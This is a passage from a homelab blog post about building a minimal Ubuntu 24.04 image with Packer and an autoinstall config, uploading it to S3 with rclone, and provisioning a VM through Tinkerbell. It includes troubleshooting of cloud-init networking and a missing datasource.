</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;qemu&#34; &#34;ubuntu-base&#34;</span> {
</span></span><span style="display:flex;"><span>  iso_url           <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://releases.ubuntu.com/${local.ubuntu-major}/ubuntu-${local.ubuntu-major}.${local.ubuntu-minor}-live-server-${local.ubuntu-arch}.iso&#34;</span>
</span></span><span style="display:flex;"><span>  iso_checksum      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256:d6dab0c3a657988501b4bd76f1297c053df710e06e0c3aece60dead24f270b4d&#34;</span>
</span></span><span style="display:flex;"><span>  output_directory  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_command  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  shutdown_timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  disk_size         <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;8G&#34;</span>
</span></span><span style="display:flex;"><span>  cpus              <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>  memory            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;4096&#34;</span>
</span></span><span style="display:flex;"><span>  format            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;raw&#34;</span>
</span></span><span style="display:flex;"><span>  accelerator       <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;kvm&#34;</span>
</span></span><span style="display:flex;"><span>  firmware          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/share/edk2-ovmf/OVMF_CODE.fd&#34;</span>
</span></span><span style="display:flex;"><span>  net_device        <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio-net&#34;</span>
</span></span><span style="display:flex;"><span>  disk_interface    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtio&#34;</span>
</span></span><span style="display:flex;"><span>  communicator      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;none&#34;</span>
</span></span><span style="display:flex;"><span>  vm_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${local.img-name}&#34;</span>
</span></span><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-base-autoinstall&#34;</span>)
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  boot_command <span style="color:#f92672">=</span> [&#34;&lt;wait&gt;e&lt;wait5&gt;&#34;, &#34;&lt;down&gt;&lt;wait&gt;&lt;down&gt;&lt;wait&gt;&lt;down&gt;&lt;wait2&gt;&lt;end&gt;&lt;wait5&gt;&#34;, &#34;&lt;bs&gt;&lt;bs&gt;&lt;bs&gt;&lt;bs&gt;&lt;wait&gt;autoinstall ds<span style="color:#f92672">=</span>nocloud-net\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://</span>{{ .<span style="color:#66d9ef">HTTPIP</span> }}<span style="color:#960050;background-color:#1e0010">:</span>{{ .<span style="color:#66d9ef">HTTPPort</span> }}<span style="color:#960050;background-color:#1e0010">/</span> <span style="color:#960050;background-color:#1e0010">---&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&lt;</span><span style="color:#66d9ef">f10</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>]
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu-base-${local.ubuntu-major}.${local.ubuntu-minor}-${local.ubuntu-arch}&#34;</span>
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.qemu.ubuntu-base&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">post</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">processor</span> <span style="color:#e6db74">&#34;shell-local&#34;</span> {
</span></span><span style="display:flex;"><span>    script <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/scripts/s3-upload.sh&#34;</span>
</span></span><span style="display:flex;"><span>    environment_vars <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;OUT_DIR<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">abspath</span>(<span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">out_dir</span>)<span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;OUT_NAME<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">img-name</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_PROVIDER<span style="color:#f92672">=</span><span style="color:#66d9ef">Ceph</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_TYPE<span style="color:#f92672">=</span><span style="color:#66d9ef">s3</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_ACCESS_KEY_ID<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">s3-access</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_SECRET_ACCESS_KEY<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">s3-secret</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;RCLONE_CONFIG_CEPHS3_ENDPOINT<span style="color:#f92672">=</span><span style="color:#66d9ef">https</span><span style="color:#960050;background-color:#1e0010">://</span><span style="color:#66d9ef">s3</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This Packer file starts out with downloading the current Ubuntu 24.04.2 Server LTS
install image. It then uses Packer&rsquo;s <a href="https://developer.hashicorp.com/packer/integrations/hashicorp/qemu/latest/components/builder/qemu">Qemu plugin</a>
to launch a VM on the machine where the Packer build is executed.
The way the automation works is always pretty funny to me. See the <code>boot_commnd</code>
parameter above. Packer just takes control of the keyboard and types in what
you&rsquo;d type in to run an Ubuntu autoinstall. The small HTTP server used to
supply the <code>user-data</code> is automatically started by Packer and made available to
the VM. This file uses Ubuntu&rsquo;s <a href="https://canonical-subiquity.readthedocs-hosted.com/en/latest/index.html">autoinstall</a>
to automate the installation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e">#cloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">autoinstall</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">version</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">identity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hostname</span>: <span style="color:#e6db74">&#34;ubuntu-base&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;$6$exDY1mhS4KUYCE/2$zmn9ToZwTKLhCw.b4/b.ZRTIZM30JZ4QrOQ2aOXJ8yk96xpcCof0kxKwuX1kqLG/ygbJ1f8wxED22bTL4F46P0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">locale</span>: <span style="color:#ae81ff">en_US.UTF-8</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">source</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">id</span>: <span style="color:#ae81ff">ubuntu-server-minimal</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">layout</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">direct</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install-server</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">late-commands</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo &#39;ubuntu ALL=(ALL) NOPASSWD:ALL&#39; &gt; /target/etc/sudoers.d/sysuser</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">shutdown</span>: <span style="color:#ae81ff">poweroff</span>
</span></span></code></pre></div><p>Not that much configuration is necessary here. I create the <code>ubuntu</code> user here
just as an escape hatch, so that when something goes wrong with later provisioning
steps, I still have a way to get into the machine. It&rsquo;s removed in the first
steps of my Homelab Ansible playbook.</p>
<p>As I&rsquo;ve noted above, I don&rsquo;t need any additional customization here, the plan
was to create a really generic and small image I could then customize once it
was installed on a machine.</p>
<p>The last interesting part is the post-processor in the Packer file. Here, I
wrote a little script that uploads the finished image to my S3 storage, so
Tinkerbell has a place to install it from. This is what the <code>s3-upload.sh</code>
script looks like:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/bin/sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ! command -v rclone &gt; /dev/null; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Command rclone not found, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>image<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>OUT_DIR<span style="color:#e6db74">}</span><span style="color:#e6db74">/</span><span style="color:#e6db74">${</span>OUT_NAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> ! -f <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Could not find image &#39;</span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;Copying </span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">...&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>env
</span></span><span style="display:flex;"><span>rclone copy <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>image<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> cephs3:public/images/ <span style="color:#f92672">||</span> exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>exit <span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>It uses <a href="https://rclone.org/">rclone</a> to upload the image file to S3. One advantage
of starting out with a generic image is that it doesn&rsquo;t contain any secrets or
credentials, so there&rsquo;s no problem with putting it on a (internally) public S3
bucket.
The credentials for the S3 upload are taken from Vault via Packer&rsquo;s integration
in the <code>s3-access</code> and <code>s3-secret</code> variables at the beginning of the Packer file.</p>
<h2 id="provisioning-the-vm-via-tinkerbell">Provisioning the VM via Tinkerbell</h2>
<p>And now finally, I was ready to fully provision a VM with Tinkerbell. This
requires an update of the Tinkerbell Template, which now looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-template</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    name: test-template
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    version: &#34;0.1&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    global_timeout: 600
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    tasks:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: &#34;os installation&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        worker: &#34;{{`{{.machine_mac}}`}}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        volumes:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev:/dev
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - /dev/console:/dev/console
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        actions:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - name: &#34;install ubuntu&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            image: quay.io/tinkerbell/actions/image2disk:latest
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            timeout: 900
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            environment:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                IMG_URL: {{ .Values.images.ubuntuBaseAmd64 }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                DEST_DISK: /dev/sda
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                COMPRESSED: false</span>
</span></span></code></pre></div><p>And that just worked, right out of the box. The Tinkerbell <code>image2disk</code> action
downloaded the image from S3 and automatically put it onto the VM&rsquo;s local disk.</p>
<p>And just like that, I had a fully deployed VM, provisioned via Tinkerbell. &#x1f389;</p>
<p>But not so fast. Of course, the first thing missing here was a proper cloud-init
config to set up my standard Ansible user so I could run my standard playbook.
<a href="https://cloud-init.io/">Cloud-init</a> can download configurations for the initial
boot from a cloud provider, codified in the <code>user-data</code> and <code>vendor-data</code>.
It runs in several phases during boot, first, before the network is available,
from local config files. And then, afterwards, from <code>user-data</code> provided e.g.
by the cloud provider via a HTTP server. The <code>user-data</code> and <code>vendor-data</code> can
also be provided from local files entirely. There&rsquo;s a wide range of configurations
that can be done via cloud-init. From creating local users and installing packages
to configuring mounts and networking.</p>
<p>To supply this cloud-init data, Tinkerbell has the <a href="https://tinkerbell.org/docs/services/tootles/">Tootles</a>
component. It implements AWS&rsquo; EC2 metadata service API, which is also supported
by cloud-init. The metadata reported by Tootles for any given instance is
supplied via the Hardware object:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">tinkerbell.org/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Hardware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">instance</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">id</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:5a:91:8c</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ips</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.20</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_pxe</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">operating_system</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">distro</span>: <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">version</span>: <span style="color:#e6db74">&#34;24.04&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">disks</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">device</span>: <span style="color:#ae81ff">/dev/sda</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">interfaces</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">dhcp</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">arch</span>: <span style="color:#ae81ff">x86_64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">hostname</span>: <span style="color:#ae81ff">test-vm</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mac</span>: <span style="color:#ae81ff">10</span>:<span style="color:#ae81ff">66</span>:<span style="color:#ae81ff">6a:5a:91:8c</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ip</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">address</span>: <span style="color:#ae81ff">203.0.113.20</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">netmask</span>: <span style="color:#ae81ff">255.255.255.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_servers</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">10.86.25.254</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">uefi</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">netboot</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowPXE</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allowWorkflow</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">userData</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    packages:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - openssh-server
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - python3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - sudo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    ssh_pwauth: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    disable_root: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    allow_public_ssh_keys: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    timezone: &#34;Europe/Berlin&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    users:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - name: ansible-user
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        shell: /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ssh_authorized_keys:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          - from=&#34;192.0.2.100&#34; ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaxn8l16GNyBEgYzWO0BAko9fw8kkIq9tbels3hXdUt user@foo
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        sudo: ALL=(ALL:ALL) ALL
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    runcmd:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl enable ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      - systemctl start ssh.service
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    power_state:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      delay: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      timeout: 2
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      mode: reboot</span>
</span></span></code></pre></div><p>The first change necessary here is to add the <code>spec.interfaces[].dhcp.ip</code> section.
This is one of the suboptimal pieces of Tinkerbell. I&rsquo;m not actually having
Tinkerbell do the IPAM part of DHCP, that&rsquo;s still left to my OPNsense router.
But I still needed to specify the VM&rsquo;s IP here, because the EC2 API, and thus
Tootles, determines which metadata to return by the IP the request is coming
from. So if you just do a request for <code>/2009-04-04/meta-data</code> from any host,
you won&rsquo;t get a response. The request needs to come from an IP which has a
Hardware object. Another downside is that the <code>spec.metadata</code> section needs to
be defined manually - it&rsquo;s not automatically created from the rest of the Hardware
object.</p>
<p>Then we come to the actually interesting part, the <code>spec.userData</code>. This is the
cloud-init config returned to the machine upon request. As I&rsquo;ve noted above,
the main goal here is to configure the new machine so I can run my main Ansible
playbook on it. I&rsquo;m making sure that my Ansible user exists, has my SSH key
and is in the sudoers file. In addition, I&rsquo;m making sure that SSH is started
and then finally reboot the machine. The <code>#cloud-init</code> comment is load-bearing
by the way, without it cloud-init won&rsquo;t accept the configuration.</p>
<p>So far so good, but this configuration still did not work. The central issue was
that the machine did not have proper networking config. The <code>ip addr</code> command
was showing the Ethernet interface being down. This confused me, because the
cloud-init config clearly states that, when there&rsquo;s no explicit network config
given, a default using DHCP for all interfaces will be applied.</p>
<p>So I went searching. And that wasn&rsquo;t easy, because it turns out that Ubuntu&rsquo;s
server-minimal install is so minimal that it even eschews vi or nano. I had to
look at files with <code>cat</code>. But I was finally able to find what I was looking for.
In <code>/etc/netplan/50-cloud-init.yaml</code>, I found this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">network</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">version</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ethernets</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">ens3</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dhcp4</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>That file was created by the installer during the Packer install run. But of
course, the NIC had a different name in that environment than it has on the
final VM.
To remedy this, I added another task to the Tinkerbell Template, removing the
cloud-init config created by the installer so that the defaults apply:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;remove installer network config&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/tinkerbell/actions/writefile:latest</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_DISK</span>: {{ <span style="color:#ae81ff">`{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">FS_TYPE</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_PATH</span>: <span style="color:#ae81ff">/etc/cloud/cloud.cfg.d/90-installer-network.cfg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">UID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">GID</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">MODE</span>: <span style="color:#ae81ff">0600</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DIRMODE</span>: <span style="color:#ae81ff">0700</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">CONTENTS</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      # Removed during provisioning</span>
</span></span></code></pre></div><p>This task is executed after the image is dd&rsquo;d onto the disk, mounts the root
partition and overrides the file content with a comment.</p>
<p>But even after that, I was still not getting my cloud-init user-config applied.
After some more searching, I found the file <code>/run/cloud/init/cloud-init-generator.log</code>
with the following content:</p>
<pre tabindex="0"><code>ds-identify rc=1
cloud-init is enabled but no datasource found, disabling
</code></pre><p>I could have avoided this problem by following Tinkerbell&rsquo;s <a href="https://tinkerbell.org/docs/integrations/cloudinit/">cloud-init docs</a>.
There, the example contains two more tasks:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;add cloud-init config&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/tinkerbell/actions/writefile:latest</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_DISK</span>: {{ <span style="color:#ae81ff">`{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_PATH</span>: <span style="color:#ae81ff">/etc/cloud/cloud.cfg.d/10_tinkerbell.cfg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DIRMODE</span>: <span style="color:#e6db74">&#34;0700&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">FS_TYPE</span>: <span style="color:#ae81ff">ext4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">GID</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">MODE</span>: <span style="color:#e6db74">&#34;0600&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">UID</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">CONTENTS</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      datasource:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Ec2:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          metadata_urls: [&#34;http://203.0.113.200:7172&#34;]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          strict_id: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      manage_etc_hosts: localhost
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      warnings:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        dsid_missing_source: off</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;add cloud-init ds-identity&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/tinkerbell/actions/writefile:latest</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">DEST_DISK</span>: {{ <span style="color:#ae81ff">`{{ formatPartition ( index .Hardware.Disks 0 ) 2 }}` }}</span>
